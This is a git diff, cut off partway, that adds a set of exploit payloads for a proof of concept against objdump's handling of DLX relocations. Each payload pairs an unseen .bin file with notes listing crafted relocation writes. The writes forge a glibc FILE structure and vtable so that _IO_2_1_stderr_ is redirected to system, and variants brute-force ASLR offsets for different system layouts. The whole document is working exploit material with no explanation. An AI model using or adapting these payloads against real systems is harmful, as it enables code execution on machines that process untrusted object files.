+off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
+sec_size_offset=0x38
+
+000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0
+003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0
+006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58
+007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58
+008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c
+009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c
+010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x4680 sym=0xf020ff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x4638 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e5ff.bin
new file mode 100644
index 0000000..9eb3932
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e5ff.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e5ff.notes
new file mode 100644
index 0000000..8a29d18
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e5ff.notes
@@ -0,0 +1,34 @@
+layout=orig
+flag_byte4=0x06
+buf_delta=0xf020ff00
+wide_delta=0x4fff0000
+system_delta=0x6f43e5ff
+command=P
+off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
+sec_size_offset=0x38
+
+000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0
+003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0
+006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58
+007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58
+008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c
+009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c
+010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x4680 sym=0xf020ff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x4638 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e6ff.bin
new file mode 100644
index 0000000..b534929
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e6ff.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e6ff.notes
new file mode 100644
index 0000000..29646cd
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e6ff.notes
@@ -0,0 +1,34 @@
+layout=orig
+flag_byte4=0x06
+buf_delta=0xf020ff00
+wide_delta=0x4fff0000
+system_delta=0x6f43e6ff
+command=P
+off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
+sec_size_offset=0x38
+
+000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0
+003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0
+006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58
+007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58
+008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c
+009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c
+010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x4680 sym=0xf020ff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x4638 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e5ff.bin
new file mode 100644
index 0000000..714a463
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e5ff.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e5ff.notes
new file mode 100644
index 0000000..2df83df
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e5ff.notes
@@ -0,0 +1,34 @@
+layout=orig
+flag_byte4=0x06
+buf_delta=0xf020ff00
+wide_delta=0x4fff0000
+system_delta=0x7043e5ff
+command=P
+off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
+sec_size_offset=0x38
+
+000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0
+003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0
+006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58
+007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58
+008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c
+009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c
+010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x4680 sym=0xf020ff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x4638 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f42e600.bin
new file mode 100644
index 0000000..0666622
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f42e600.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f42e600.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f42e600.notes
new file mode 100644
index 0000000..61582b1
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f42e600.notes
@@ -0,0 +1,34 @@
+layout=wsl2404
+flag_byte4=0x05
+buf_delta=0x6f300000
+wide_delta=0x4fff0000
+system_delta=0x6f42e600
+command=P
+off_io=-0x3690 off_sec=0xbb0 rbase=0x220
+sec_size_offset=0x38
+
+000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
+003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
+006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8
+007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8
+008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec
+009 target=0xbec sym=0x000000ff finish write bytes at 0xbec
+010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x3628 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e5ff.bin
new file mode 100644
index 0000000..795cdee
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e5ff.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e5ff.notes
new file mode 100644
index 0000000..b9c2213
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e5ff.notes
@@ -0,0 +1,34 @@
+layout=wsl2404
+flag_byte4=0x05
+buf_delta=0x6f300000
+wide_delta=0x4fff0000
+system_delta=0x6f43e5ff
+command=P
+off_io=-0x3690 off_sec=0xbb0 rbase=0x220
+sec_size_offset=0x38
+
+000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
+003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
+006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8
+007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8
+008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec
+009 target=0xbec sym=0x000000ff finish write bytes at 0xbec
+010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x3628 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e6ff.bin
new file mode 100644
index 0000000..47f529f
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e6ff.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e6ff.notes
new file mode 100644
index 0000000..ada2a44
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e6ff.notes
@@ -0,0 +1,34 @@
+layout=wsl2404
+flag_byte4=0x05
+buf_delta=0x6f300000
+wide_delta=0x4fff0000
+system_delta=0x6f43e6ff
+command=P
+off_io=-0x3690 off_sec=0xbb0 rbase=0x220
+sec_size_offset=0x38
+
+000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
+003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
+006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8
+007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8
+008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec
+009 target=0xbec sym=0x000000ff finish write bytes at 0xbec
+010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x3628 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s7043e5ff.bin
new file mode 100644
index 0000000..d912cc4
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s7043e5ff.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s7043e5ff.notes
new file mode 100644
index 0000000..2eb01e5
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s7043e5ff.notes
@@ -0,0 +1,34 @@
+layout=wsl2404
+flag_byte4=0x05
+buf_delta=0x6f300000
+wide_delta=0x4fff0000
+system_delta=0x7043e5ff
+command=P
+off_io=-0x3690 off_sec=0xbb0 rbase=0x220
+sec_size_offset=0x38
+
+000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
+003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
+006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8
+007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8
+008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec
+009 target=0xbec sym=0x000000ff finish write bytes at 0xbec
+010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x3628 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f42e600.bin
new file mode 100644
index 0000000..98a9e31
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f42e600.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f42e600.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f42e600.notes
new file mode 100644
index 0000000..75abf9d
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f42e600.notes
@@ -0,0 +1,34 @@
+layout=wsl2404
+flag_byte4=0x05
+buf_delta=0x702fff00
+wide_delta=0x4fff0000
+system_delta=0x6f42e600
+command=P
+off_io=-0x3690 off_sec=0xbb0 rbase=0x220
+sec_size_offset=0x38
+
+000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
+003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
+006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8
+007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8
+008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec
+009 target=0xbec sym=0x000000ff finish write bytes at 0xbec
+010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x3628 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e5ff.bin
new file mode 100644
index 0000000..08b387c
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e5ff.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e5ff.notes
new file mode 100644
index 0000000..bd5c091
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e5ff.notes
@@ -0,0 +1,34 @@
+layout=wsl2404
+flag_byte4=0x05
+buf_delta=0x702fff00
+wide_delta=0x4fff0000
+system_delta=0x6f43e5ff
+command=P
+off_io=-0x3690 off_sec=0xbb0 rbase=0x220
+sec_size_offset=0x38
+
+000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
+003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
+006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8
+007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8
+008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec
+009 target=0xbec sym=0x000000ff finish write bytes at 0xbec
+010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x3628 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e6ff.bin
new file mode 100644
index 0000000..050c5e9
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e6ff.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e6ff.notes
new file mode 100644
index 0000000..739c8e2
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e6ff.notes
@@ -0,0 +1,34 @@
+layout=wsl2404
+flag_byte4=0x05
+buf_delta=0x702fff00
+wide_delta=0x4fff0000
+system_delta=0x6f43e6ff
+command=P
+off_io=-0x3690 off_sec=0xbb0 rbase=0x220
+sec_size_offset=0x38
+
+000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
